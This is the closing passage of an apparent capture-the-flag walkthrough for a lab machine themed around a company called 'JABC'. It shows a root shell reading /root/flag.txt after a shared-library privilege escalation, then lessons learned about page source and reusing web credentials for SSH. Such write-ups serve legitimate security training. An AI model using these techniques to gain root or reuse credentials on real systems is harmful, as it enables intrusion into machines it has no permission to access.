creating shared library
# whoami
root
# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?
#

Done!

Conclusion

A great box. Took me a long time again as I went down the rabbit hole (for hours) of looking for Drupal exploits when I should’ve been looking at the Documentation page a bit closer! Takeaways of this VM are to always look at the page source on every page and to never forget to try weird web-based credentials as SSH credentials!
